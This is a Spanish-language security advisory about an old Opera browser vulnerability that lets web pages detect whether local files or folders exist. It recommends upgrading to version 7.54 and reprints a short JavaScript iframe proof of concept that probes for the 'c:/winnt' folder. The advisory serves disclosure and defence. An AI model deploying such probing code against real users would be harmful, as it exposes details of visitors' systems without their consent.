Se ha descubierto una vulnerabilidad en algunas versiones del popular
navegador Opera que podría ser explotada por un usuario remoto para
adquirir información sensible de un sistema remoto.
Cuando se asigna a un iframe un archivo o directorio que no existe,
este navegador generará un error. Un usuario remoto puede crear código
HTML que carga un iframe y cambia la URL de dicho recurso a un archivo
o directorio local, y entonces se detecta si hay ese error para
determinar si ese elemento existe.
Se recomienda actualizar a la versión 7.54, disponible en la siguiente
dirección:
http://www.opera.com/download/
Como ejemplo el siguiente código extraído de la web de GreyMagic, nos
permite saber si la carpeta "winnt" existe en la máquina de la víctima.
"<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
var sLocal="c:/winnt";
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+" does not exists.");
} catch (oErr) {
alert(sLocal+" exists.");
}
},
250
);
}
</script>"
Más Información:
Opera Local File/Directory Detection.
http://www.greymagic.com/security/advisories/gm009-op/
Opera Local File IFRAME Error Response Lets Remote Users Determine if Files
or Directories Exist
http://www.securitytracker.com/alerts/2004/Aug/1010966.html
Antonio Román
roman@hispasec.com